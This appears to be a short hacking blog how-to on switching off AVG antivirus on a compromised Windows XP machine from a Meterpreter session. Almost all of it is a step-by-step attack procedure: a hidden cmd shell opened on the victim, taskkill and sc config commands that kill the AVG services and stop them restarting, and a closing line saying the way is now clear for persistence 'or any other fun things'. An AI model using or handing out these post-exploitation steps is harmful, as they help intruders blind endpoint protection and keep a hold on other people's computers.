How to Disable Anti Virus Services After Got Meterpreter Session on Remote PC.

Hello Friends …

My name is Suresh Senarathna and this is my first "How-To" post,

Now I am going to show you how to stop all antivirus services after got meterpreter session in your victim,

(I'm using MS windows Xp as my victim OS and AVG Antivirus guard as an example)

In meterpreter session we can use "killav" command to kill AVG services which running in victim's PC, but it will not stop all running services of AVG ,

So we going to use "taskkill" command to stop all ruining avg services,

1) First type:

execute –f cmd.exe –c –H

In meterpreter terminal , it will execute hidden cmd on our victim OS.

then type,

interact n

(n=channel number) to interact with it.

2) Then type:

tasklist /SVC | find /I "avg"

to find what are the running AVG services.

3) After it type:

taskkill /F /IM "avg"

to kill those running services,

But as you can see all those services are not terminated, because some of them are restart itself and those are unable to stop,

4) To verify it type:

sc queryex (service name)

5) So we had to stop those services auto-starting itself.to do that, type:

sc config (service name) start=disabled

6) Then do taskkill again,

taskkill /F /IM "avg"*

7) Finally type:

tasklist /SVC | find /I "avg"

to verify all avg services are terminated….

Now all the running and auto-starting AVG services are terminated.

So you can create persistence or any other fun things with out having any antivirus guard problem,

(P.S : is any thing I have done wrong way plz correct me, thanks for reading)